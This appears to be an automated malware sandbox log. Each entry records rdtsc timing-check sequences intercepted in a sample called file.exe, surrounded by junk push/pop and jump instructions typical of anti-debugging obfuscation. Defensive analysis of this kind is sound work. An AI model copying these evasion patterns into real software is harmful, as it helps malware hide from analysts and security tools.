              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31026 second address: C3102E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3102E second address: C31034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31300 second address: C31304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31304 second address: C3130A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3656C second address: C36585 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C36889 second address: C36891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C36891 second address: C3689C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3689C second address: C368A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C36CD7 second address: C36CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 jno 00007F65E53D9516h 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C36CEA second address: C36CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B50B second address: C3B52C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F65E53D9516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F65E53D9521h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B52C second address: C3B53E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B53E second address: C3B548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B548 second address: C3B54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B54E second address: C3B567 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65E53D9516h 0x00000008 jng 00007F65E53D9516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4491D second address: C44932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48C1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C44932 second address: C44941 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007F65E53D9516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42BEC second address: C42C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F65E53D48C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F65E53D48B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42C11 second address: C42C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42F26 second address: C42F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42F30 second address: C42F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D9524h 0x00000009 jmp 00007F65E53D951Ch 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42F57 second address: C42F5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42F5D second address: C42F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D9523h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C430FA second address: C430FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43828 second address: C43832 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43985 second address: C4398F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65E53D48B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C483FC second address: C48421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F65E53D9516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F65E53D9521h 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F65E53D9516h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48421 second address: C4844C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007F65E53D48C9h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F65E53D48B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4844C second address: C48450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B977F0 second address: B97807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F65E53D48BFh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97807 second address: B9782E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65E53D9516h 0x00000008 js 00007F65E53D9516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F65E53D9523h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9782E second address: B97834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E0FE second address: C4E119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E119 second address: C4E140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48BAh 0x00000009 popad 0x0000000a push eax 0x0000000b jnp 00007F65E53D48BEh 0x00000011 push eax 0x00000012 pop eax 0x00000013 jnl 00007F65E53D48B6h 0x00000019 pushad 0x0000001a jl 00007F65E53D48B6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B848 second address: C5B84C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D39C second address: C5D3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48BDh 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5FA85 second address: C5FA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63CE6 second address: C63D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C7h 0x00000007 jng 00007F65E53D48BEh 0x0000000d jng 00007F65E53D48B6h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63D15 second address: C63D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63D1B second address: C63D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63D1F second address: C63D2B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65E53D9516h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FBDF second address: C6FBE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FBE4 second address: C6FBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65E53D951Eh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76303 second address: C76309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76309 second address: C7631A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jo 00007F65E53D9518h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76186 second address: C7618C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7618C second address: C76192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76192 second address: C76196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79170 second address: C7917A instructions: 0x00000000 rdtsc 0x00000002 je 00007F65E53D9516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D46D second address: C7D477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F65E53D48B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D477 second address: C7D47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D47B second address: C7D487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F65E53D48B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D487 second address: C7D4DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F65E53D952Ch 0x00000011 jmp 00007F65E53D9524h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F65E53D9529h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C846A6 second address: C846AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82F22 second address: C82F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82F26 second address: C82F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82F2F second address: C82F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82F37 second address: C82F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48BAh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F65E53D48C7h 0x00000011 jmp 00007F65E53D48BAh 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C830CC second address: C830ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C833C5 second address: C833E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007F65E53D48C1h 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e jo 00007F65E53D48BEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83824 second address: C8383F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9526h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C839A3 second address: C839C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C6h 0x00000007 jg 00007F65E53D48B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C895E8 second address: C8960B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push edx 0x00000008 js 00007F65E53D9516h 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007F65E53D9521h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7103 second address: CA7114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jg 00007F65E53D48B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7114 second address: CA7119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7119 second address: CA7143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F65E53D48B6h 0x0000000b jmp 00007F65E53D48BCh 0x00000010 jmp 00007F65E53D48BAh 0x00000015 popad 0x00000016 ja 00007F65E53D48C2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7143 second address: CA7167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F65E53D9516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F65E53D9526h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7167 second address: CA7178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D48BDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6CFD second address: CA6D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E40 second address: CA6E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E46 second address: CA6E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E4F second address: CA6E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBFE44 second address: CBFE6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9526h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F65E53D951Ch 0x0000000f ja 00007F65E53D9516h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC00EE second address: CC00FA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65E53D48B6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC06A9 second address: CC06CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F65E53D9516h 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F65E53D9518h 0x00000014 pushad 0x00000015 popad 0x00000016 jne 00007F65E53D951Eh 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0818 second address: CC0855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48C6h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f jnl 00007F65E53D48C3h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jnc 00007F65E53D48B6h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0855 second address: CC085B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC085B second address: CC0869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F65E53D48B6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0869 second address: CC086D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC09E9 second address: CC09FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F65E53D48BCh 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3A6A second address: CC3A94 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dl, 36h 0x00000010 push dword ptr [ebp+122D1DA6h] 0x00000016 mov dword ptr [ebp+122D29C2h], eax 0x0000001c push B661DC23h 0x00000021 jnp 00007F65E53D9529h 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4CCB second address: CC4CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC67E8 second address: CC67EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC67EC second address: CC680E instructions: 0x00000000 rdtsc 0x00000002 je 00007F65E53D48B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65E53D48C0h 0x00000011 jnc 00007F65E53D48B6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC680E second address: CC681D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC681D second address: CC6823 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6823 second address: CC6829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6414 second address: CC6418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6418 second address: CC641C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8218 second address: CC821E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180353 second address: 5180357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180357 second address: 518035D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518035D second address: 5180366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 81DBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B046B second address: 51B048B instructions: 0x00000000 rdtsc 0x00000002 mov dh, 57h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov di, si 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F65E53D48C1h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B048B second address: 51B04B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F65E53D951Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B04B7 second address: 51B04BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B04BD second address: 51B0522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, 2BBBAD67h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e jmp 00007F65E53D951Ah 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F65E53D951Ch 0x0000001d xor si, BEC8h 0x00000022 jmp 00007F65E53D951Bh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F65E53D9528h 0x0000002e sub si, 4128h 0x00000033 jmp 00007F65E53D951Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
